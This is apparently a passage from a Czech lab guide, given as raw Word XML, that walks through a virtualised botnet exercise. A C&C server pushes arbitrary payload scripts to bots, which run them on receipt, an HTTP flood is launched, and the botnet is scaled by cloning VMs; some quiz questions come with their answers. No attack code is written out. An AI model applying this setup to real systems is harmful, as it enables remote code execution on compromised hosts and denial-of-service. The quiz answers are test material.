    <w:p w14:paraId="67E13A11" w14:textId="03231D2B" w:rsidR="00E076AB" w:rsidRPr="00EE24CD" w:rsidRDefault="00E076AB" w:rsidP="00E076AB">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Krok 3. Zkouška funkčnosti prvků</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3961DB48" w14:textId="430A168F" w:rsidR="006D037C" w:rsidRDefault="00256E3F" w:rsidP="00802F9E">
      <w:r>
        <w:t xml:space="preserve">Ještě pro ujištění, že vše funguje si spustíme DNS </w:t>
      </w:r>
      <w:r w:rsidR="006825CF">
        <w:t>server,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00733099">
        <w:t xml:space="preserve">kde </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bychom </w:t>
      </w:r>
      <w:r w:rsidR="00733099">
        <w:t xml:space="preserve">měli </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">najít script </w:t>
      </w:r>
      <w:r w:rsidR="006D037C">
        <w:t>log_ips.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E395A5" w14:textId="04015D01" w:rsidR="002C0F0B" w:rsidRDefault="006D037C" w:rsidP="006D037C">
      <w:r w:rsidRPr="006D037C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05D5DF2D" wp14:editId="78DF86E1">
            <wp:extent cx="2238687" cy="333422"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="139288016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0168" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2238687" cy="333422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF9ED16" w14:textId="2A1F995B" w:rsidR="006D037C" w:rsidRDefault="006D037C" w:rsidP="006D037C">
      <w:r>
        <w:t xml:space="preserve">Po spuštění </w:t>
      </w:r>
      <w:r w:rsidR="00733099">
        <w:t>bude poslouchat na portu 9445. Na CnC serveru si zkopírujeme payload_check_to_server.py na payloadcheck.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2911A89A" w14:textId="5D03761F" w:rsidR="00733099" w:rsidRPr="006D037C" w:rsidRDefault="00733099" w:rsidP="006D037C">
      <w:r w:rsidRPr="00733099">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68D76232" wp14:editId="29DEF753">
            <wp:extent cx="5849166" cy="476316"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34266515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5151" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5849166" cy="476316"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC08214" w14:textId="4EA568BE" w:rsidR="00802F9E" w:rsidRDefault="00733099" w:rsidP="009A75C7">
      <w:r>
        <w:t xml:space="preserve">A navíc spustíme manuálně serverc.py (většina scriptů je už spuštěna jako service, kde ale špatně uvidíme výstup ze spuštěných souborů), který je vlastně náš hlavní script na CnC serveru. Ten bude odpovídat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>botům</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> z botnetu pakety, ve kterých bude obsah souboru payloadcheck.py. Tím můžeme celému botnetu automaticky rozposílat jakýkoliv script který chceme.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC9952D" w14:textId="32744E4D" w:rsidR="00E076AB" w:rsidRDefault="00E076AB" w:rsidP="009A75C7">
      <w:r>
        <w:t xml:space="preserve">(Zde můžeme spustit spíše </w:t>
      </w:r>
      <w:r w:rsidR="008F0D71">
        <w:t>rovnou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> na CnC </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>serveru,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> než přes Kali, znova za důrazem se podívat co se přesně děje při spuštění scénáře)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13988437" w14:textId="21C34817" w:rsidR="00733099" w:rsidRDefault="00E076AB" w:rsidP="009A75C7">
      <w:r w:rsidRPr="00E076AB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BB14CEE" wp14:editId="3BE1379A">
            <wp:extent cx="3705742" cy="362001"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23930444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04446" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3705742" cy="362001"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="206D6654" w14:textId="05657850" w:rsidR="00E076AB" w:rsidRDefault="00E076AB" w:rsidP="009A75C7">
      <w:r>
        <w:t xml:space="preserve">Nakonec pro celkovou kontrolu si ještě spustíme http/Apache server, </w:t>
      </w:r>
      <w:r w:rsidR="001673A0">
        <w:t xml:space="preserve">tím by měl fungovat web server. Z Kali tak můžeme zkontrolovat vyhledáním 176.16.1.10 a </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="001673A0" w:rsidRPr="009E5BCB">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>www.victim.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001673A0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F49E33C" w14:textId="78C2A790" w:rsidR="001673A0" w:rsidRDefault="001673A0" w:rsidP="009A75C7">
      <w:r w:rsidRPr="001673A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EA32BCF" wp14:editId="11FCB9E2">
            <wp:extent cx="3570136" cy="896573"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8150639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63916" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3576296" cy="898120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6233D9" w14:textId="70F942FC" w:rsidR="001673A0" w:rsidRDefault="001673A0" w:rsidP="009A75C7">
      <w:r w:rsidRPr="001673A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="258BB369" wp14:editId="64576F52">
            <wp:extent cx="4818490" cy="1029364"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="21447240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24043" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4824262" cy="1030597"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A891E42" w14:textId="0CC3E8A3" w:rsidR="001673A0" w:rsidRDefault="001673A0" w:rsidP="009A75C7">
      <w:r>
        <w:t>Obě dvě adresy by měli ukazovat to samé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA532A7" w14:textId="78DD393D" w:rsidR="001673A0" w:rsidRDefault="001673A0" w:rsidP="009A75C7">
      <w:r>
        <w:t>Otázka 2.3: Co nám překládá adresu victim.com, že stále vidíme stránku web serveru?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04411153" w14:textId="033C0E8F" w:rsidR="00733099" w:rsidRDefault="001673A0" w:rsidP="001673A0">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>DNS server</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAD6B15" w14:textId="1A0BBD3E" w:rsidR="001673A0" w:rsidRDefault="001673A0" w:rsidP="001673A0">
      <w:r>
        <w:t>A pokud teď spustíme jednoho bota z botnetu, tak na CnC serveru (kde je zapnutý serverc.py) a na DNS serveru (kde je zapnutý log_ips.py), by se měli ukázat informace kam a co se posílá.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5786F0C6" w14:textId="3B984E1F" w:rsidR="001673A0" w:rsidRDefault="00582222" w:rsidP="001673A0">
      <w:r w:rsidRPr="00582222">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CF9D10E" wp14:editId="0385A32C">
            <wp:extent cx="6395085" cy="2687320"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="812256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56795" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6395085" cy="2687320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5810DFD7" w14:textId="4D3F58CD" w:rsidR="00582222" w:rsidRDefault="00582222" w:rsidP="001673A0">
      <w:r w:rsidRPr="00582222">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="123E8DFC" wp14:editId="04D9CA67">
            <wp:extent cx="3839111" cy="466790"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="19200724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72449" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3839111" cy="466790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A18C2F" w14:textId="77777777" w:rsidR="00582222" w:rsidRDefault="00582222" w:rsidP="001673A0">
      <w:r>
        <w:t>Jak jde vidět z ukázky, bot z botnetu kontaktoval CnC server (taková žádost, jestli CnC server nemá nějaký kód na spuštění), který mu odpověděl obsahem payloadcheck.py, plus ještě vidíme zkrácenou zprávu že z našeho serveru 10.2.1.10 se odpověď poslala na IP adresu 192.1.1.11.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFFC918" w14:textId="32ECBE02" w:rsidR="00582222" w:rsidRDefault="00582222" w:rsidP="001673A0">
      <w:r>
        <w:t xml:space="preserve">Zároveň na DNS serveru očekáváme zprávu na portu 9445, což ve payload scriptu teď je nastavená jako </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, která nakonec přijde a </w:t>
      </w:r>
      <w:r w:rsidR="003337F8">
        <w:t xml:space="preserve">DNS server si </w:t>
      </w:r>
      <w:r>
        <w:t>za</w:t>
      </w:r>
      <w:r w:rsidR="00B52016">
        <w:t>píše</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP adresu odesilatele. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68782B10" w14:textId="63D1A33B" w:rsidR="008F0D71" w:rsidRDefault="008F0D71" w:rsidP="001673A0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Otazka</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.4: Jaký balíček a jaké moduly se používají na </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcriptu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> na CnC serveru.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E847C33" w14:textId="4080D25F" w:rsidR="008F0D71" w:rsidRPr="008F0D71" w:rsidRDefault="008F0D71" w:rsidP="008F0D71">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">balíček </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>scapy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> a moduly send, IP, TCP, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012E9312" w14:textId="157DE24F" w:rsidR="00733099" w:rsidRDefault="001673A0" w:rsidP="00B52016">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Část 3. Scénář HTTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04176457" w14:textId="52E9AD83" w:rsidR="002435D7" w:rsidRDefault="002435D7" w:rsidP="002435D7">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:r>
        <w:t>Krok 1. Spuštění útoku</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095D33A8" w14:textId="0B6D886D" w:rsidR="00B52016" w:rsidRDefault="00B52016" w:rsidP="00B52016">
      <w:r>
        <w:t>Z minulé části teď můžeme vypnou</w:t>
      </w:r>
      <w:r w:rsidR="003337F8">
        <w:t xml:space="preserve">t script který běží na DNS serveru a u už zapnutého bota spustíme </w:t>
      </w:r>
      <w:r w:rsidR="002435D7">
        <w:t>bot_listen.py (tento script už běží v pozadí, ale pro jeho output ho spustíme manuálně)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E4197B" w14:textId="314A48C3" w:rsidR="002435D7" w:rsidRDefault="002435D7" w:rsidP="00B52016">
      <w:r w:rsidRPr="002435D7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09D61F2F" wp14:editId="76770658">
            <wp:extent cx="3610479" cy="457264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="101122879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8797" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3610479" cy="457264"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="303756BC" w14:textId="6D0ABA36" w:rsidR="002435D7" w:rsidRDefault="002435D7" w:rsidP="00B52016">
      <w:r>
        <w:t>Přes Kali na CnC serveru zkopírujeme payload_http_test.py na payloadcheck.py a spustíme script cnc_ping.py, který „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pingne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>“ každého bota, který už někdy kontaktoval CnC server, to spustí v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bot_listen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scriptu to, že spustí další script, který už kontaktuje CnC server žádostí o payload soubor a ten mu ho zpětně pošle. A po obdržení se rovnou spustí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF62C32" w14:textId="77777777" w:rsidR="006825CF" w:rsidRDefault="006825CF" w:rsidP="00B52016"/>
    <w:p w14:paraId="4A8C8814" w14:textId="4E0D5D79" w:rsidR="002435D7" w:rsidRDefault="00A2150D" w:rsidP="00B52016">
      <w:r w:rsidRPr="00A2150D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71C7BCED" wp14:editId="0B67081B">
            <wp:extent cx="4333461" cy="2407476"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="133943184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1845" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4384058" cy="2435585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B58D74" w14:textId="7E9705CD" w:rsidR="00A2150D" w:rsidRDefault="00A2150D" w:rsidP="00B52016">
      <w:r w:rsidRPr="00A2150D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02C67872" wp14:editId="479F0745">
            <wp:extent cx="6265628" cy="2755483"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
            <wp:docPr id="17776304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30431" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6267222" cy="2756184"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2491DE7F" w14:textId="7AD83C3B" w:rsidR="00A2150D" w:rsidRDefault="00A2150D" w:rsidP="00B52016">
      <w:r w:rsidRPr="00A2150D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="548B9613" wp14:editId="5D53FF67">
            <wp:extent cx="6011186" cy="3045882"/>
            <wp:effectExtent l="0" t="0" r="8890" b="2540"/>
            <wp:docPr id="148949817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98170" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6015718" cy="3048178"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="674D455C" w14:textId="0E92E231" w:rsidR="00A2150D" w:rsidRDefault="00A2150D" w:rsidP="00B52016">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ze snímků si tedy můžeme </w:t>
      </w:r>
      <w:r w:rsidR="00803F62">
        <w:t>ověřit,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> že se vážně útok podařil rozběhnout – cnc_ping.py se spustil správně (po zapnutí jakéhokoliv bota, pokud má přístup k CnC serveru, by se měl přiřadit do .log souboru na CnC serveru) a </w:t>
      </w:r>
      <w:r w:rsidR="00803F62">
        <w:t>kontaktoval</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> adresu 192.1.1.11.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755F9845" w14:textId="6ED4C9DB" w:rsidR="00A2150D" w:rsidRDefault="00A2150D" w:rsidP="00B52016">
      <w:r>
        <w:t>Na botu se tento ping byl zachycen a spustil se script botb.py, což ne naše „žádost“ o payload. A na CnC serveru náš script detekoval žádost bota a poslal mu náš nakopírovaný payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E02F27" w14:textId="67D8C4C1" w:rsidR="00A2150D" w:rsidRDefault="00A2150D" w:rsidP="00B52016">
      <w:r>
        <w:t xml:space="preserve">A nakonec znova na botu </w:t>
      </w:r>
      <w:r w:rsidR="00803F62">
        <w:t>se zobrazilo, co se bude spouštět za script a jelikož u funkce send() máme verbose=true, tak nám to začne vypisovat znázorněné pakety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E781B2D" w14:textId="2A24B2A0" w:rsidR="00803F62" w:rsidRDefault="00803F62" w:rsidP="00803F62">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Krok 2. </w:t>
      </w:r>
      <w:r w:rsidR="00941DD4">
        <w:t>Škálování botnetu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DAB43A" w14:textId="201C6739" w:rsidR="00803F62" w:rsidRDefault="00803F62" w:rsidP="00803F62">
      <w:r>
        <w:t xml:space="preserve">Jelikož ve skutečném světě se používají tisíce přístrojů na </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> útoky, tak je asi zřejmé, že jeden script toho moc neudělá (mohl by</w:t>
      </w:r>
      <w:r w:rsidR="00B6791D">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pokud by nešlo o čistý </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> útok). Takže první </w:t>
      </w:r>
      <w:r w:rsidR="00941DD4">
        <w:t>krok,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kter</w:t>
      </w:r>
      <w:r w:rsidR="00941DD4">
        <w:t>ým</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zvýšíme efektivitu útoku je přidat více strojů (naklonování).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0FE3CC" w14:textId="4680EC49" w:rsidR="00941DD4" w:rsidRDefault="00941DD4" w:rsidP="00941DD4">
      <w:r>
        <w:t>To se může udělat buď přes VirtualBox (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctrl+O</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>), nebo přes „</w:t>
      </w:r>
      <w:r w:rsidRPr="00941DD4">
        <w:t>vboxmanage</w:t>
      </w:r>
      <w:r>
        <w:t>.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00941DD4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00941DD4">
        <w:t>clonevm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">“ příkazem, který ovšem potřebuje oprávnění, a navíc pro náš scénář můžeme mít jen pár </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>botů</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, jinak se vypotřebuje výpočetní výkon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161EAE41" w14:textId="00E04726" w:rsidR="00941DD4" w:rsidRPr="00941DD4" w:rsidRDefault="00941DD4" w:rsidP="00941DD4">
      <w:r>
        <w:t xml:space="preserve">Takže použijeme variantu naklonování ve VB. Změníme jméno a pro ušetření místa použijeme propojený klon. Opakujeme </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4 krát</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, abychom měli celkem 6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>botů</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D53CF2" w14:textId="4A496374" w:rsidR="00941DD4" w:rsidRPr="00941DD4" w:rsidRDefault="00941DD4" w:rsidP="00941DD4">
      <w:r w:rsidRPr="00941DD4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C79488E" wp14:editId="1F9C4C52">
            <wp:extent cx="3212327" cy="2329994"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="161032589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5890" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
